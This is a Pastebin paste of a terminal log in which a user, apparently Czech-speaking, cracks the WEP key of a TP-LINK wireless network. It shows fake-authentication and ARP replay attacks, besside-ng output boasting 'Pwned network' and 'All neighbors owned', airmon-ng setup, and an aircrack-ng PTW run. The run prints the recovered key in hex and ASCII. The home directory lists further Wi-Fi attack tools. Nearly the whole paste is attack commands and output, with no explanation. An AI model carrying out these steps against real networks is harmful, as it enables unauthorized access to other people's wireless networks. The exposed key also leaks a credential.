Advertisement
Trsak

Untitled

Jul 13th, 2020
157
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.59 KB | None | 0 0
  1. [+] select target(s) (1-2) separated by commas, dashes or all: 1
  2.  
  3. [+] (1/1) Starting attacks against 14:CC:20:93:D5:E2 (TP-LINK_93D5E2)
  4. [+] attempting fake-authentication with 14:CC:20:93:D5:E2... success
  5. [+] TP-LINK_93D5E2 (42db) WEP replay: 0/10000 IVs, fakeauth, Waiting for packet...
  6. [!] restarting aireplay after 11 seconds of no new IVs
  7. [+] TP-LINK_93D5E2 (41db) WEP replay: 27790/10000 IVs, fakeauth, Replaying @ 600/sec
  8. [+] replay WEP attack successful
  9.  
  10. [+] ESSID: TP-LINK_93D5E2
  11. [+] BSSID: 14:CC:20:93:D5:E2
  12. [+] Encryption: WEP
  13. [+] Hex Key: 74:61:6A:6E:65:68:65:73:6C:6F:31:32:33
  14. [+] Ascii Key: tajneheslo123
  15. [+] saved crack result to cracked.txt (1 total)
  16. [+] Finished attacking 1 target(s), exiting
  17.  
  18.  
  19. [21:00:53] Got key for TP-LINK_93D5E2 [74:61:6a:6e:65:68:65:73:6c:6f:31:32:33] 110176 IVs
  20. [21:00:53] Pwned network TP-LINK_93D5E2 in 4:21 mins:sec
  21. [21:00:53] TO-OWN [] OWNED [TP-LINK_93D5E2]
  22. [21:00:53] All neighbors owned
  23.  
  24. Dying...
  25. [21:00:53] TO-OWN [] OWNED [TP-LINK_93D5E2]
  26. trsak@trsak-MS-7B47:~$ sudo airmong-ng
  27. sudo: airmong-ng: příkaz nenalezen
  28. trsak@trsak-MS-7B47:~$ sudo airmon-ng
  29.  
  30. PHY Interface Driver Chipset
  31.  
  32. phy0 wlp6s0 ath9k Qualcomm Atheros AR9287 Wireless Network Adapter (PCI-Express) (rev 01)
  33.  
  34. trsak@trsak-MS-7B47:~$ sudo airmon-ng check wlp6s0
  35.  
  36. Found 3 processes that could cause trouble.
  37. Kill them using 'airmon-ng check kill' before putting
  38. the card in monitor mode, they will interfere by changing channels
  39. and sometimes putting the interface back in managed mode
  40.  
  41. PID Name
  42. 808 NetworkManager
  43. 3556 avahi-daemon
  44. 3557 avahi-daemon
  45.  
  46. trsak@trsak-MS-7B47:~$ sudo kill 3557
  47. trsak@trsak-MS-7B47:~$ sudo kill 3556
  48. trsak@trsak-MS-7B47:~$ ls
  49. aircrack-ng-1.6.tar.gz Hudba vystup-01.cap
  50. airgeddon install.sh vystup-01.csv
  51. asleap Obrázky vystup-01.kismet.csv
  52. asleap-2.2 Plocha vystup-01.kismet.netxml
  53. besside.log replay_arp-0712-201315.cap vystup-01.log.csv
  54. bully snap vystup-01-14-CC-20-93-D5-E2.xor
  55. Dokumenty Stažené wep.cap
  56. go Šablony wpa.cap
  57. hcxdumptool Veřejné
  58. hostapd-wpe Videa
  59. trsak@trsak-MS-7B47:~$ sudo aircrack-ng ./wep.cap
  60. Reading packets, please wait...
  61. Opening ./wep.cap
  62. Read 112530 packets.
  63.  
  64. # BSSID ESSID Encryption
  65.  
  66. 1 14:CC:20:93:D5:E2 TP-LINK_93D5E2 WEP (0 IVs)
  67. 2 60:AB:67:E3:3B:9E WEP (0 IVs)
  68.  
  69. Index number of target network ? 1
  70.  
  71. Reading packets, please wait...
  72. Opening ./wep.cap
  73. Read 112530 packets.
  74.  
  75. 1 potential targets
  76.  
  77. Attack will be restarted every 5000 captured ivs.
  78. Starting PTW attack with 112387 ivs.
  79.  
  80.  
  81. Aircrack-ng 1.6
  82.  
  83.  
  84. [00:00:00] Tested 12596 keys (got 112387 IVs)
  85.  
  86. KB depth byte(vote)
  87. 0 0/ 1 74(152064) 20(130816) 46(126464) 0E(124928) 2C(121856) DE(121344)
  88. 1 0/ 1 61(145152) 2F(131072) 59(124672) D0(122368) 22(121600) 08(121344)
  89. 2 0/ 1 6A(148992) B3(129024) 0A(126208) 25(126208) 36(126208) 59(125952)
  90. 3 0/ 1 6E(161024) EF(126720) FC(124928) 47(124672) 2B(124416) 53(124160)
  91. 4 0/ 1 65(154624) 42(128768) 80(126976) 92(126464) 63(126208) D1(123392)
  92. 5 0/ 1 68(157440) 23(125184) 36(123136) 4D(123136) 2B(122880) 03(122624)
  93. 6 0/ 1 65(150784) 81(128768) B1(126720) 3E(123392) B5(123392) AD(122880)
  94. 7 0/ 1 73(153088) 68(128000) 64(126976) 1E(125440) 61(124160) A6(123648)
  95. 8 0/ 1 6C(140544) B6(125696) CD(123392) 83(123136) B8(122368) 0D(121856)
  96. 9 0/ 1 6F(156928) F1(126208) B4(125440) EC(124160) 88(123904) 70(123648)
  97. 10 0/ 1 E4(124672) 86(124160) 6D(123392) A6(123392) E6(123392) 63(123136)
  98. 11 0/ 1 F4(129024) C6(128256) F7(128000) 8B(125440) 3E(125184) 4B(124928)
  99. 12 0/ 1 33(143208) EC(126584) 40(126280) 58(125960) 5B(125072) 19(124360)
  100.  
  101. KEY FOUND! [ 74:61:6A:6E:65:68:65:73:6C:6F:31:32:33 ] (ASCII: tajneheslo123 )
  102. Decrypted correctly: 100%
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement